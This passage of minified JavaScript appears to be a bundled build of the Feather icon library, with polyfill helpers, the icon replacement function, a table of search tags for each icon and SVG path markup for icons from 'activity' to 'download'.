"function" == typeof i && ("string" != typeof n || o(i, "name") || r(i, "name", n), h(i).source = x.join("string" == typeof n ? n : "")), e !== t ? (c ? !y && e[n] && (p = !0) : delete e[n], p ? e[n] = i : r(e, n, i)) : p ? e[n] = i : a(n, i)
})(Function.prototype, "toString", function () {
return "function" == typeof this && y(this).source || c.call(this)
})
}, function (e, n) {
var i = {}.toString;
e.exports = function (e) {
return i.call(e).slice(8, -1)
}
}, function (e, n, i) {
var t = i(8),
l = i(73),
r = i(10),
o = i(14),
a = i(18),
c = i(1),
p = i(35),
y = Object.getOwnPropertyDescriptor;
n.f = t ? y : function (e, n) {
if (e = o(e), n = a(n, !0), p) try {
return y(e, n)
} catch (e) {}
if (c(e, n)) return r(!l.f.call(e, n), e[n])
}
}, function (e, n, i) {
var t = i(0),
l = i(31).f,
r = i(5),
o = i(29),
a = i(19),
c = i(71),
p = i(65);
e.exports = function (e, n) {
var i, y, h, x, s, u = e.target,
d = e.global,
f = e.stat;
if (i = d ? t : f ? t[u] || a(u, {}) : (t[u] || {}).prototype)
for (y in n) {
if (x = n[y], h = e.noTargetGet ? (s = l(i, y)) && s.value : i[y], !p(d ? y : u + (f ? "." : "#") + y, e.forced) && void 0 !== h) {
if (typeof x == typeof h) continue;
c(x, h)
}(e.sham || h && h.sham) && r(x, "sham", !0), o(i, y, x, e)
}
}
}, function (e, n) {
var i = 0,
t = Math.random();
e.exports = function (e) {
return "Symbol(".concat(void 0 === e ? "" : e, ")_", (++i + t).toString(36))
}
}, function (e, n, i) {
var t = i(0),
l = i(6),
r = t.document,
o = l(r) && l(r.createElement);
e.exports = function (e) {
return o ? r.createElement(e) : {}
}
}, function (e, n, i) {
var t = i(8),
l = i(4),
r = i(34);
e.exports = !t && !l(function () {
return 7 != Object.defineProperty(r("div"), "a", {
get: function () {
return 7
}
}).a
})
}, function (e, n, i) {
var t = i(11);
e.exports = t("native-function-to-string", Function.toString)
}, function (e, n, i) {
var t, l, r, o = i(76),
a = i(0),
c = i(6),
p = i(5),
y = i(1),
h = i(16),
x = i(15),
s = a.WeakMap;
if (o) {
var u = new s,
d = u.get,
f = u.has,
g = u.set;
t = function (e, n) {
return g.call(u, e, n), n
}, l = function (e) {
return d.call(u, e) || {}
}, r = function (e) {
return f.call(u, e)
}
} else {
var v = h("state");
x[v] = !0, t = function (e, n) {
return p(e, v, n), n
}, l = function (e) {
return y(e, v) ? e[v] : {}
}, r = function (e) {
return y(e, v)
}
}
e.exports = {
set: t,
get: l,
has: r,
enforce: function (e) {
return r(e) ? l(e) : t(e, {})
},
getterFor: function (e) {
return function (n) {
var i;
if (!c(n) || (i = l(n)).type !== e) throw TypeError("Incompatible receiver, " + e + " required");
return i
}
}
}
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t = Object.assign || function (e) {
for (var n = 1; n < arguments.length; n++) {
var i = arguments[n];
for (var t in i) Object.prototype.hasOwnProperty.call(i, t) && (e[t] = i[t])
}
return e
},
l = o(i(22)),
r = o(i(12));
function o(e) {
return e && e.__esModule ? e : {
default: e
}
}
n.default = function () {
var e = arguments.length > 0 && void 0 !== arguments[0] ? arguments[0] : {};
if ("undefined" == typeof document) throw new Error("`feather.replace()` only works in a browser environment.");
var n = document.querySelectorAll("[data-feather]");
Array.from(n).forEach(function (n) {
return function (e) {
var n = arguments.length > 1 && void 0 !== arguments[1] ? arguments[1] : {},
i = function (e) {
return Array.from(e.attributes).reduce(function (e, n) {
return e[n.name] = n.value, e
}, {})
}(e),
o = i["data-feather"];
delete i["data-feather"];
var a = r.default[o].toSvg(t({}, n, i, {
class: (0, l.default)(n.class, i.class)
})),
c = (new DOMParser).parseFromString(a, "image/svg+xml").querySelector("svg");
e.parentNode.replaceChild(c, e)
}(n, e)
})
}
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t, l = i(12),
r = (t = l) && t.__esModule ? t : {
default: t
};
n.default = function (e) {
var n = arguments.length > 1 && void 0 !== arguments[1] ? arguments[1] : {};
if (console.warn("feather.toSvg() is deprecated. Please use feather.icons[name].toSvg() instead."), !e) throw new Error("The required `key` (icon name) parameter is missing.");
if (!r.default[e]) throw new Error("No icon matching '" + e + "'. See the complete list of icons at https://feathericons.com");
return r.default[e].toSvg(n)
}
}, function (e) {
e.exports = {
activity: ["pulse", "health", "action", "motion"],
airplay: ["stream", "cast", "mirroring"],
"alert-circle": ["warning", "alert", "danger"],
"alert-octagon": ["warning", "alert", "danger"],
"alert-triangle": ["warning", "alert", "danger"],
"align-center": ["text alignment", "center"],
"align-justify": ["text alignment", "justified"],
"align-left": ["text alignment", "left"],
"align-right": ["text alignment", "right"],
anchor: [],
archive: ["index", "box"],
"at-sign": ["mention", "at", "email", "message"],
award: ["achievement", "badge"],
aperture: ["camera", "photo"],
"bar-chart": ["statistics", "diagram", "graph"],
"bar-chart-2": ["statistics", "diagram", "graph"],
battery: ["power", "electricity"],
"battery-charging": ["power", "electricity"],
bell: ["alarm", "notification", "sound"],
"bell-off": ["alarm", "notification", "silent"],
bluetooth: ["wireless"],
"book-open": ["read", "library"],
book: ["read", "dictionary", "booklet", "magazine", "library"],
bookmark: ["read", "clip", "marker", "tag"],
box: ["cube"],
briefcase: ["work", "bag", "baggage", "folder"],
calendar: ["date"],
camera: ["photo"],
cast: ["chromecast", "airplay"],
circle: ["off", "zero", "record"],
clipboard: ["copy"],
clock: ["time", "watch", "alarm"],
"cloud-drizzle": ["weather", "shower"],
"cloud-lightning": ["weather", "bolt"],
"cloud-rain": ["weather"],
"cloud-snow": ["weather", "blizzard"],
cloud: ["weather"],
codepen: ["logo"],
codesandbox: ["logo"],
code: ["source", "programming"],
coffee: ["drink", "cup", "mug", "tea", "cafe", "hot", "beverage"],
columns: ["layout"],
command: ["keyboard", "cmd", "terminal", "prompt"],
compass: ["navigation", "safari", "travel", "direction"],
copy: ["clone", "duplicate"],
"corner-down-left": ["arrow", "return"],
"corner-down-right": ["arrow"],
"corner-left-down": ["arrow"],
"corner-left-up": ["arrow"],
"corner-right-down": ["arrow"],
"corner-right-up": ["arrow"],
"corner-up-left": ["arrow"],
"corner-up-right": ["arrow"],
cpu: ["processor", "technology"],
"credit-card": ["purchase", "payment", "cc"],
crop: ["photo", "image"],
crosshair: ["aim", "target"],
database: ["storage", "memory"],
delete: ["remove"],
disc: ["album", "cd", "dvd", "music"],
"dollar-sign": ["currency", "money", "payment"],
droplet: ["water"],
edit: ["pencil", "change"],
"edit-2": ["pencil", "change"],
"edit-3": ["pencil", "change"],
eye: ["view", "watch"],
"eye-off": ["view", "watch", "hide", "hidden"],
"external-link": ["outbound"],
facebook: ["logo", "social"],
"fast-forward": ["music"],
figma: ["logo", "design", "tool"],
"file-minus": ["delete", "remove", "erase"],
"file-plus": ["add", "create", "new"],
"file-text": ["data", "txt", "pdf"],
film: ["movie", "video"],
filter: ["funnel", "hopper"],
flag: ["report"],
"folder-minus": ["directory"],
"folder-plus": ["directory"],
folder: ["directory"],
framer: ["logo", "design", "tool"],
frown: ["emoji", "face", "bad", "sad", "emotion"],
gift: ["present", "box", "birthday", "party"],
"git-branch": ["code", "version control"],
"git-commit": ["code", "version control"],
"git-merge": ["code", "version control"],
"git-pull-request": ["code", "version control"],
github: ["logo", "version control"],
gitlab: ["logo", "version control"],
globe: ["world", "browser", "language", "translate"],
"hard-drive": ["computer", "server", "memory", "data"],
hash: ["hashtag", "number", "pound"],
headphones: ["music", "audio", "sound"],
heart: ["like", "love", "emotion"],
"help-circle": ["question mark"],
hexagon: ["shape", "node.js", "logo"],
home: ["house", "living"],
image: ["picture"],
inbox: ["email"],
instagram: ["logo", "camera"],
key: ["password", "login", "authentication", "secure"],
layers: ["stack"],
layout: ["window", "webpage"],
"life-bouy": ["help", "life ring", "support"],
link: ["chain", "url"],
"link-2": ["chain", "url"],
linkedin: ["logo", "social media"],
list: ["options"],
lock: ["security", "password", "secure"],
"log-in": ["sign in", "arrow", "enter"],
"log-out": ["sign out", "arrow", "exit"],
mail: ["email", "message"],
"map-pin": ["location", "navigation", "travel", "marker"],
map: ["location", "navigation", "travel"],
maximize: ["fullscreen"],
"maximize-2": ["fullscreen", "arrows", "expand"],
meh: ["emoji", "face", "neutral", "emotion"],
menu: ["bars", "navigation", "hamburger"],
"message-circle": ["comment", "chat"],
"message-square": ["comment", "chat"],
"mic-off": ["record", "sound", "mute"],
mic: ["record", "sound", "listen"],
minimize: ["exit fullscreen", "close"],
"minimize-2": ["exit fullscreen", "arrows", "close"],
minus: ["subtract"],
monitor: ["tv", "screen", "display"],
moon: ["dark", "night"],
"more-horizontal": ["ellipsis"],
"more-vertical": ["ellipsis"],
"mouse-pointer": ["arrow", "cursor"],
move: ["arrows"],
music: ["note"],
navigation: ["location", "travel"],
"navigation-2": ["location", "travel"],
octagon: ["stop"],
package: ["box", "container"],
paperclip: ["attachment"],
pause: ["music", "stop"],
"pause-circle": ["music", "audio", "stop"],
"pen-tool": ["vector", "drawing"],
percent: ["discount"],
"phone-call": ["ring"],
"phone-forwarded": ["call"],
"phone-incoming": ["call"],
"phone-missed": ["call"],
"phone-off": ["call", "mute"],
"phone-outgoing": ["call"],
phone: ["call"],
play: ["music", "start"],
"pie-chart": ["statistics", "diagram"],
"play-circle": ["music", "start"],
plus: ["add", "new"],
"plus-circle": ["add", "new"],
"plus-square": ["add", "new"],
pocket: ["logo", "save"],
power: ["on", "off"],
printer: ["fax", "office", "device"],
radio: ["signal"],
"refresh-cw": ["synchronise", "arrows"],
"refresh-ccw": ["arrows"],
repeat: ["loop", "arrows"],
rewind: ["music"],
"rotate-ccw": ["arrow"],
"rotate-cw": ["arrow"],
rss: ["feed", "subscribe"],
save: ["floppy disk"],
scissors: ["cut"],
search: ["find", "magnifier", "magnifying glass"],
send: ["message", "mail", "email", "paper airplane", "paper aeroplane"],
settings: ["cog", "edit", "gear", "preferences"],
"share-2": ["network", "connections"],
shield: ["security", "secure"],
"shield-off": ["security", "insecure"],
"shopping-bag": ["ecommerce", "cart", "purchase", "store"],
"shopping-cart": ["ecommerce", "cart", "purchase", "store"],
shuffle: ["music"],
"skip-back": ["music"],
"skip-forward": ["music"],
slack: ["logo"],
slash: ["ban", "no"],
sliders: ["settings", "controls"],
smartphone: ["cellphone", "device"],
smile: ["emoji", "face", "happy", "good", "emotion"],
speaker: ["audio", "music"],
star: ["bookmark", "favorite", "like"],
"stop-circle": ["media", "music"],
sun: ["brightness", "weather", "light"],
sunrise: ["weather", "time", "morning", "day"],
sunset: ["weather", "time", "evening", "night"],
tablet: ["device"],
tag: ["label"],
target: ["logo", "bullseye"],
terminal: ["code", "command line", "prompt"],
thermometer: ["temperature", "celsius", "fahrenheit", "weather"],
"thumbs-down": ["dislike", "bad", "emotion"],
"thumbs-up": ["like", "good", "emotion"],
"toggle-left": ["on", "off", "switch"],
"toggle-right": ["on", "off", "switch"],
tool: ["settings", "spanner"],
trash: ["garbage", "delete", "remove", "bin"],
"trash-2": ["garbage", "delete", "remove", "bin"],
triangle: ["delta"],
truck: ["delivery", "van", "shipping", "transport", "lorry"],
tv: ["television", "stream"],
twitch: ["logo"],
twitter: ["logo", "social"],
type: ["text"],
umbrella: ["rain", "weather"],
unlock: ["security"],
"user-check": ["followed", "subscribed"],
"user-minus": ["delete", "remove", "unfollow", "unsubscribe"],
"user-plus": ["new", "add", "create", "follow", "subscribe"],
"user-x": ["delete", "remove", "unfollow", "unsubscribe", "unavailable"],
user: ["person", "account"],
users: ["group"],
"video-off": ["camera", "movie", "film"],
video: ["camera", "movie", "film"],
voicemail: ["phone"],
volume: ["music", "sound", "mute"],
"volume-1": ["music", "sound"],
"volume-2": ["music", "sound"],
"volume-x": ["music", "sound", "mute"],
watch: ["clock", "time"],
"wifi-off": ["disabled"],
wifi: ["connection", "signal", "wireless"],
wind: ["weather", "air"],
"x-circle": ["cancel", "close", "delete", "remove", "times", "clear"],
"x-octagon": ["delete", "stop", "alert", "warning", "times", "clear"],
"x-square": ["cancel", "close", "delete", "remove", "times", "clear"],
x: ["cancel", "close", "delete", "remove", "times", "clear"],
youtube: ["logo", "video", "play"],
"zap-off": ["flash", "camera", "lightning"],
zap: ["flash", "camera", "lightning"],
"zoom-in": ["magnifying glass"],
"zoom-out": ["magnifying glass"]
}
}, function (e) {
e.exports = {
activity: '<polyline points="22 12 18 12 15 21 9 3 6 12 2 12"></polyline>',
airplay: '<path d="M5 17H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v10a2 2 0 0 1-2 2h-1"></path><polygon points="12 15 17 21 7 21 12 15"></polygon>',
"alert-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="12" y1="8" x2="12" y2="12"></line><line x1="12" y1="16" x2="12.01" y2="16"></line>',
"alert-octagon": '<polygon points="7.86 2 16.14 2 22 7.86 22 16.14 16.14 22 7.86 22 2 16.14 2 7.86 7.86 2"></polygon><line x1="12" y1="8" x2="12" y2="12"></line><line x1="12" y1="16" x2="12.01" y2="16"></line>',
"alert-triangle": '<path d="M10.29 3.86L1.82 18a2 2 0 0 0 1.71 3h16.94a2 2 0 0 0 1.71-3L13.71 3.86a2 2 0 0 0-3.42 0z"></path><line x1="12" y1="9" x2="12" y2="13"></line><line x1="12" y1="17" x2="12.01" y2="17"></line>',
"align-center": '<line x1="18" y1="10" x2="6" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="18" y1="18" x2="6" y2="18"></line>',
"align-justify": '<line x1="21" y1="10" x2="3" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="21" y1="18" x2="3" y2="18"></line>',
"align-left": '<line x1="17" y1="10" x2="3" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="17" y1="18" x2="3" y2="18"></line>',
"align-right": '<line x1="21" y1="10" x2="7" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="21" y1="18" x2="7" y2="18"></line>',
anchor: '<circle cx="12" cy="5" r="3"></circle><line x1="12" y1="22" x2="12" y2="8"></line><path d="M5 12H2a10 10 0 0 0 20 0h-3"></path>',
aperture: '<circle cx="12" cy="12" r="10"></circle><line x1="14.31" y1="8" x2="20.05" y2="17.94"></line><line x1="9.69" y1="8" x2="21.17" y2="8"></line><line x1="7.38" y1="12" x2="13.12" y2="2.06"></line><line x1="9.69" y1="16" x2="3.95" y2="6.06"></line><line x1="14.31" y1="16" x2="2.83" y2="16"></line><line x1="16.62" y1="12" x2="10.88" y2="21.94"></line>',
archive: '<polyline points="21 8 21 21 3 21 3 8"></polyline><rect x="1" y="3" width="22" height="5"></rect><line x1="10" y1="12" x2="14" y2="12"></line>',
"arrow-down-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="8 12 12 16 16 12"></polyline><line x1="12" y1="8" x2="12" y2="16"></line>',
"arrow-down-left": '<line x1="17" y1="7" x2="7" y2="17"></line><polyline points="17 17 7 17 7 7"></polyline>',
"arrow-down-right": '<line x1="7" y1="7" x2="17" y2="17"></line><polyline points="17 7 17 17 7 17"></polyline>',
"arrow-down": '<line x1="12" y1="5" x2="12" y2="19"></line><polyline points="19 12 12 19 5 12"></polyline>',
"arrow-left-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="12 8 8 12 12 16"></polyline><line x1="16" y1="12" x2="8" y2="12"></line>',
"arrow-left": '<line x1="19" y1="12" x2="5" y2="12"></line><polyline points="12 19 5 12 12 5"></polyline>',
"arrow-right-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="12 16 16 12 12 8"></polyline><line x1="8" y1="12" x2="16" y2="12"></line>',
"arrow-right": '<line x1="5" y1="12" x2="19" y2="12"></line><polyline points="12 5 19 12 12 19"></polyline>',
"arrow-up-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="16 12 12 8 8 12"></polyline><line x1="12" y1="16" x2="12" y2="8"></line>',
"arrow-up-left": '<line x1="17" y1="17" x2="7" y2="7"></line><polyline points="7 17 7 7 17 7"></polyline>',
"arrow-up-right": '<line x1="7" y1="17" x2="17" y2="7"></line><polyline points="7 7 17 7 17 17"></polyline>',
"arrow-up": '<line x1="12" y1="19" x2="12" y2="5"></line><polyline points="5 12 12 5 19 12"></polyline>',
"at-sign": '<circle cx="12" cy="12" r="4"></circle><path d="M16 8v5a3 3 0 0 0 6 0v-1a10 10 0 1 0-3.92 7.94"></path>',
award: '<circle cx="12" cy="8" r="7"></circle><polyline points="8.21 13.89 7 23 12 20 17 23 15.79 13.88"></polyline>',
"bar-chart-2": '<line x1="18" y1="20" x2="18" y2="10"></line><line x1="12" y1="20" x2="12" y2="4"></line><line x1="6" y1="20" x2="6" y2="14"></line>',
"bar-chart": '<line x1="12" y1="20" x2="12" y2="10"></line><line x1="18" y1="20" x2="18" y2="4"></line><line x1="6" y1="20" x2="6" y2="16"></line>',
"battery-charging": '<path d="M5 18H3a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h3.19M15 6h2a2 2 0 0 1 2 2v8a2 2 0 0 1-2 2h-3.19"></path><line x1="23" y1="13" x2="23" y2="11"></line><polyline points="11 6 7 12 13 12 9 18"></polyline>',
battery: '<rect x="1" y="6" width="18" height="12" rx="2" ry="2"></rect><line x1="23" y1="13" x2="23" y2="11"></line>',
"bell-off": '<path d="M13.73 21a2 2 0 0 1-3.46 0"></path><path d="M18.63 13A17.89 17.89 0 0 1 18 8"></path><path d="M6.26 6.26A5.86 5.86 0 0 0 6 8c0 7-3 9-3 9h14"></path><path d="M18 8a6 6 0 0 0-9.33-5"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
bell: '<path d="M18 8A6 6 0 0 0 6 8c0 7-3 9-3 9h18s-3-2-3-9"></path><path d="M13.73 21a2 2 0 0 1-3.46 0"></path>',
bluetooth: '<polyline points="6.5 6.5 17.5 17.5 12 23 12 1 17.5 6.5 6.5 17.5"></polyline>',
bold: '<path d="M6 4h8a4 4 0 0 1 4 4 4 4 0 0 1-4 4H6z"></path><path d="M6 12h9a4 4 0 0 1 4 4 4 4 0 0 1-4 4H6z"></path>',
"book-open": '<path d="M2 3h6a4 4 0 0 1 4 4v14a3 3 0 0 0-3-3H2z"></path><path d="M22 3h-6a4 4 0 0 0-4 4v14a3 3 0 0 1 3-3h7z"></path>',
book: '<path d="M4 19.5A2.5 2.5 0 0 1 6.5 17H20"></path><path d="M6.5 2H20v20H6.5A2.5 2.5 0 0 1 4 19.5v-15A2.5 2.5 0 0 1 6.5 2z"></path>',
bookmark: '<path d="M19 21l-7-5-7 5V5a2 2 0 0 1 2-2h10a2 2 0 0 1 2 2z"></path>',
box: '<path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path><polyline points="3.27 6.96 12 12.01 20.73 6.96"></polyline><line x1="12" y1="22.08" x2="12" y2="12"></line>',
briefcase: '<rect x="2" y="7" width="20" height="14" rx="2" ry="2"></rect><path d="M16 21V5a2 2 0 0 0-2-2h-4a2 2 0 0 0-2 2v16"></path>',
calendar: '<rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>',
"camera-off": '<line x1="1" y1="1" x2="23" y2="23"></line><path d="M21 21H3a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h3m3-3h6l2 3h4a2 2 0 0 1 2 2v9.34m-7.72-2.06a4 4 0 1 1-5.56-5.56"></path>',
camera: '<path d="M23 19a2 2 0 0 1-2 2H3a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h4l2-3h6l2 3h4a2 2 0 0 1 2 2z"></path><circle cx="12" cy="13" r="4"></circle>',
cast: '<path d="M2 16.1A5 5 0 0 1 5.9 20M2 12.05A9 9 0 0 1 9.95 20M2 8V6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2h-6"></path><line x1="2" y1="20" x2="2.01" y2="20"></line>',
"check-circle": '<path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path><polyline points="22 4 12 14.01 9 11.01"></polyline>',
"check-square": '<polyline points="9 11 12 14 22 4"></polyline><path d="M21 12v7a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h11"></path>',
check: '<polyline points="20 6 9 17 4 12"></polyline>',
"chevron-down": '<polyline points="6 9 12 15 18 9"></polyline>',
"chevron-left": '<polyline points="15 18 9 12 15 6"></polyline>',
"chevron-right": '<polyline points="9 18 15 12 9 6"></polyline>',
"chevron-up": '<polyline points="18 15 12 9 6 15"></polyline>',
"chevrons-down": '<polyline points="7 13 12 18 17 13"></polyline><polyline points="7 6 12 11 17 6"></polyline>',
"chevrons-left": '<polyline points="11 17 6 12 11 7"></polyline><polyline points="18 17 13 12 18 7"></polyline>',
"chevrons-right": '<polyline points="13 17 18 12 13 7"></polyline><polyline points="6 17 11 12 6 7"></polyline>',
"chevrons-up": '<polyline points="17 11 12 6 7 11"></polyline><polyline points="17 18 12 13 7 18"></polyline>',
chrome: '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="4"></circle><line x1="21.17" y1="8" x2="12" y2="8"></line><line x1="3.95" y1="6.06" x2="8.54" y2="14"></line><line x1="10.88" y1="21.94" x2="15.46" y2="14"></line>',
circle: '<circle cx="12" cy="12" r="10"></circle>',
clipboard: '<path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect>',
clock: '<circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>',
"cloud-drizzle": '<line x1="8" y1="19" x2="8" y2="21"></line><line x1="8" y1="13" x2="8" y2="15"></line><line x1="16" y1="19" x2="16" y2="21"></line><line x1="16" y1="13" x2="16" y2="15"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="12" y1="15" x2="12" y2="17"></line><path d="M20 16.58A5 5 0 0 0 18 7h-1.26A8 8 0 1 0 4 15.25"></path>',
"cloud-lightning": '<path d="M19 16.9A5 5 0 0 0 18 7h-1.26a8 8 0 1 0-11.62 9"></path><polyline points="13 11 9 17 15 17 11 23"></polyline>',
"cloud-off": '<path d="M22.61 16.95A5 5 0 0 0 18 10h-1.26a8 8 0 0 0-7.05-6M5 5a8 8 0 0 0 4 15h9a5 5 0 0 0 1.7-.3"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
"cloud-rain": '<line x1="16" y1="13" x2="16" y2="21"></line><line x1="8" y1="13" x2="8" y2="21"></line><line x1="12" y1="15" x2="12" y2="23"></line><path d="M20 16.58A5 5 0 0 0 18 7h-1.26A8 8 0 1 0 4 15.25"></path>',
"cloud-snow": '<path d="M20 17.58A5 5 0 0 0 18 8h-1.26A8 8 0 1 0 4 16.25"></path><line x1="8" y1="16" x2="8.01" y2="16"></line><line x1="8" y1="20" x2="8.01" y2="20"></line><line x1="12" y1="18" x2="12.01" y2="18"></line><line x1="12" y1="22" x2="12.01" y2="22"></line><line x1="16" y1="16" x2="16.01" y2="16"></line><line x1="16" y1="20" x2="16.01" y2="20"></line>',
cloud: '<path d="M18 10h-1.26A8 8 0 1 0 9 20h9a5 5 0 0 0 0-10z"></path>',
code: '<polyline points="16 18 22 12 16 6"></polyline><polyline points="8 6 2 12 8 18"></polyline>',
codepen: '<polygon points="12 2 22 8.5 22 15.5 12 22 2 15.5 2 8.5 12 2"></polygon><line x1="12" y1="22" x2="12" y2="15.5"></line><polyline points="22 8.5 12 15.5 2 8.5"></polyline><polyline points="2 15.5 12 8.5 22 15.5"></polyline><line x1="12" y1="2" x2="12" y2="8.5"></line>',
codesandbox: '<path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path><polyline points="7.5 4.21 12 6.81 16.5 4.21"></polyline><polyline points="7.5 19.79 7.5 14.6 3 12"></polyline><polyline points="21 12 16.5 14.6 16.5 19.79"></polyline><polyline points="3.27 6.96 12 12.01 20.73 6.96"></polyline><line x1="12" y1="22.08" x2="12" y2="12"></line>',
coffee: '<path d="M18 8h1a4 4 0 0 1 0 8h-1"></path><path d="M2 8h16v9a4 4 0 0 1-4 4H6a4 4 0 0 1-4-4V8z"></path><line x1="6" y1="1" x2="6" y2="4"></line><line x1="10" y1="1" x2="10" y2="4"></line><line x1="14" y1="1" x2="14" y2="4"></line>',
columns: '<path d="M12 3h7a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-7m0-18H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2h7m0-18v18"></path>',
command: '<path d="M18 3a3 3 0 0 0-3 3v12a3 3 0 0 0 3 3 3 3 0 0 0 3-3 3 3 0 0 0-3-3H6a3 3 0 0 0-3 3 3 3 0 0 0 3 3 3 3 0 0 0 3-3V6a3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3h12a3 3 0 0 0 3-3 3 3 0 0 0-3-3z"></path>',
compass: '<circle cx="12" cy="12" r="10"></circle><polygon points="16.24 7.76 14.12 14.12 7.76 16.24 9.88 9.88 16.24 7.76"></polygon>',
copy: '<rect x="9" y="9" width="13" height="13" rx="2" ry="2"></rect><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"></path>',
"corner-down-left": '<polyline points="9 10 4 15 9 20"></polyline><path d="M20 4v7a4 4 0 0 1-4 4H4"></path>',
"corner-down-right": '<polyline points="15 10 20 15 15 20"></polyline><path d="M4 4v7a4 4 0 0 0 4 4h12"></path>',
"corner-left-down": '<polyline points="14 15 9 20 4 15"></polyline><path d="M20 4h-7a4 4 0 0 0-4 4v12"></path>',
"corner-left-up": '<polyline points="14 9 9 4 4 9"></polyline><path d="M20 20h-7a4 4 0 0 1-4-4V4"></path>',
"corner-right-down": '<polyline points="10 15 15 20 20 15"></polyline><path d="M4 4h7a4 4 0 0 1 4 4v12"></path>',
"corner-right-up": '<polyline points="10 9 15 4 20 9"></polyline><path d="M4 20h7a4 4 0 0 0 4-4V4"></path>',
"corner-up-left": '<polyline points="9 14 4 9 9 4"></polyline><path d="M20 20v-7a4 4 0 0 0-4-4H4"></path>',
"corner-up-right": '<polyline points="15 14 20 9 15 4"></polyline><path d="M4 20v-7a4 4 0 0 1 4-4h12"></path>',
cpu: '<rect x="4" y="4" width="16" height="16" rx="2" ry="2"></rect><rect x="9" y="9" width="6" height="6"></rect><line x1="9" y1="1" x2="9" y2="4"></line><line x1="15" y1="1" x2="15" y2="4"></line><line x1="9" y1="20" x2="9" y2="23"></line><line x1="15" y1="20" x2="15" y2="23"></line><line x1="20" y1="9" x2="23" y2="9"></line><line x1="20" y1="14" x2="23" y2="14"></line><line x1="1" y1="9" x2="4" y2="9"></line><line x1="1" y1="14" x2="4" y2="14"></line>',
"credit-card": '<rect x="1" y="4" width="22" height="16" rx="2" ry="2"></rect><line x1="1" y1="10" x2="23" y2="10"></line>',
crop: '<path d="M6.13 1L6 16a2 2 0 0 0 2 2h15"></path><path d="M1 6.13L16 6a2 2 0 0 1 2 2v15"></path>',
crosshair: '<circle cx="12" cy="12" r="10"></circle><line x1="22" y1="12" x2="18" y2="12"></line><line x1="6" y1="12" x2="2" y2="12"></line><line x1="12" y1="6" x2="12" y2="2"></line><line x1="12" y1="22" x2="12" y2="18"></line>',
database: '<ellipse cx="12" cy="5" rx="9" ry="3"></ellipse><path d="M21 12c0 1.66-4 3-9 3s-9-1.34-9-3"></path><path d="M3 5v14c0 1.66 4 3 9 3s9-1.34 9-3V5"></path>',
delete: '<path d="M21 4H8l-7 8 7 8h13a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2z"></path><line x1="18" y1="9" x2="12" y2="15"></line><line x1="12" y1="9" x2="18" y2="15"></line>',
disc: '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="3"></circle>',
"divide-circle": '<line x1="8" y1="12" x2="16" y2="12"></line><line x1="12" y1="16" x2="12" y2="16"></line><line x1="12" y1="8" x2="12" y2="8"></line><circle cx="12" cy="12" r="10"></circle>',
"divide-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="8" y1="12" x2="16" y2="12"></line><line x1="12" y1="16" x2="12" y2="16"></line><line x1="12" y1="8" x2="12" y2="8"></line>',
divide: '<circle cx="12" cy="6" r="2"></circle><line x1="5" y1="12" x2="19" y2="12"></line><circle cx="12" cy="18" r="2"></circle>',
"dollar-sign": '<line x1="12" y1="1" x2="12" y2="23"></line><path d="M17 5H9.5a3.5 3.5 0 0 0 0 7h5a3.5 3.5 0 0 1 0 7H6"></path>',
"download-cloud": '<polyline points="8 17 12 21 16 17"></polyline><line x1="12" y1="12" x2="12" y2="21"></line><path d="M20.88 18.09A5 5 0 0 0 18 9h-1.26A8 8 0 1 0 3 16.29"></path>',
download: '<path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="7 10 12 15 17 10"></polyline><line x1="12" y1="15" x2="12" y2="3"></line>',
